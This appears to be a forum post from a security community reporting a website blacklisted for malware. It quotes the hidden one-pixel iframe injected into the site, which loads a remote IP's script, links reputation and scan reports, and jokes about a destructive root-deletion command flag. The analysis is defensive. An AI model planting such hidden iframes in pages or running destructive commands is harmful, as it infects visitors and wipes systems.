Author Topic: Site only blacklisted or with malicious iFrame?  (Read 1091 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34065
  • malware fighter
Site only blacklisted or with malicious iFrame?
« on: February 12, 2014, 12:14:29 AM »
See: http://maldb.com/sgwp.pl/#
blacklisted by Google Safe Browsing: goog-malware-shavar
Critical website security and infested with malware: http://sitecheck2.sucuri.net/results/sgwp.pl/
iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=7 src=htxp://176.31.24.102/post.php?id=783105>
ThreatSTOP does not flag this IP.->  http://sameid.net/ip/212.180.241.6/
Posted on redirect earlier here: http://forum.avast.com/index.php?topic=144960.0
See malcode history for IP: https://www.virustotal.com/nl/ip-address/176.31.24.102/information/
and here: http://urlquery.net/report.php?id=9035121
http://sameid.net/ip/176.31.24.102/
Vulnerable! ssh -  only a "--no-preserve-root" away from a dead box  :o

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!